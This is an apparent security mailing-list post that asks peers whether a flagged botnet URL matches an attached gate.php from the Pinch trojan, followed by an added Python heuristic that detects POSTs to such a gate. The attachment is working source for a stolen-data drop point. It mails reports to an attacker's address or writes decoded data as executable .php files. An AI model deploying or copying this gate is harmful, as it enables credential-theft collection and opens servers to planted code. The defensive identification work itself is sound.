[nsp-sec] 212.43.241.106 in the daily reports
Tom Fischer
tfischer at bfk.de
Mon Feb 25 09:08:33 EST 2008
Hi,
On Mon, Feb 25, 2008 at 11:51:04AM +0000, David Freedman wrote:
> ~ Your daily reports flagged 212.43.241.106 as a botnet controller with
> the URL http://www.winfleet.fr/fr/gate.php,
Does this gate.php look like the attached Pinch gate.php?
--
Tom Fischer
BFK edv-consulting GmbH tel: +49 721 962 01-1
Kriegsstr. 100, D-76133 Karlsruhe fax: +49 721 962 01-99
-------------- next part --------------
<?
//CFG
$mode = 1; //1.Send to e-mail, 2.Save to file, 3.E-mail+file
$rndatch = FALSE; //Random reports names
$savetodir = TRUE; //Save rerorts to changed directory
$dirname = "load"; //Directory name
// a - recepient
// b - subject
// c - message body
// d - file name(not *.php)
//Getting data
$ip=getenv("REMOTE_ADDR");
$email=$_POST['a'];
$subject=$_POST['b']."(".$ip.")";
$msg = str_replace(" ","+",$_POST['c']);
$var = $_POST['d'];
//Storing || Sending data
//via E-Mail
IF($mode == 1 || $mode == 3){
IF($rndatch){
$array = range('a','z');
$c=count($array);
$var = $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . $array[rand(1,$c)] . rand(0,9) . rand(0,9) . ".bin";
};
$headers = "Content-Type: application/octet-stream; name=\"".$var."\"\n";
$headers.= "Content-Transfer-Encoding: base64\n";
$headers.= "Content-Disposition: attachment; filename=\"".$var."\"\n";
mail($email, $subject, $msg, $headers);
};
//via File
IF($mode == 2 || $mode == 3){
//To dir
IF($savetodir){
// @mkdir($dirname);
@chdir($dirname);
}
//$vartype=substr($var,-3,3);
// IF($vartype == "php")
$var.=".rep";
$filename = $ip.".php";
$fp=fopen($filename,'w');
fwrite($fp, base64_decode($msg));
fclose($fp);
};
?>
<title>ret_ok</title>
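
Added example (not part of the original message or the attached script): a Python check that flags form-encoded POST bodies matching the field layout in the attachment's comments (a, b, c, d), including the space-to-"+" repair the script applies before base64 decoding. The sample body, the address drop@example.invalid and all function names are constructed for illustration; a match is a heuristic hint for triage, not proof.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# Field names from the attachment's comments:
# a = recipient, b = subject, c = message body, d = file name.
GATE_FIELDS = ("a", "b", "c", "d")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")

# Constructed sample: 15 bytes whose base64 form ends in "++++", sent
# without percent-encoding so a form parser turns each "+" into a space.
SAMPLE_RAW = b"sample-data." + b"\xfb\xef\xbe"
SAMPLE_BODY = (
    "a=drop%40example.invalid&b=report&c="
    + base64.b64encode(SAMPLE_RAW).decode("ascii")
    + "&d=report.bin"
)


def decode_report(c_value):
    """Mirror the script's str_replace(" ", "+"), then strict base64 decode."""
    candidate = c_value.replace(" ", "+")
    try:
        return base64.b64decode(candidate, validate=True)
    except (binascii.Error, ValueError):
        return None


def classify_post(body):
    """Return (is_match, details) for one form-encoded POST body (str)."""
    fields = parse_qs(body, keep_blank_values=True)
    missing = [f for f in GATE_FIELDS if f not in fields]
    if missing:
        return False, {"missing": missing}
    recipient = fields["a"][0]
    payload = decode_report(fields["c"][0])
    details = {
        "recipient": recipient,
        "recipient_is_email": bool(EMAIL_RE.match(recipient)),
        "payload_len": None if payload is None else len(payload),
        "file_name": fields["d"][0],
    }
    is_match = details["recipient_is_email"] and bool(payload)
    return is_match, details


if __name__ == "__main__":
    print(classify_post(SAMPLE_BODY))
```
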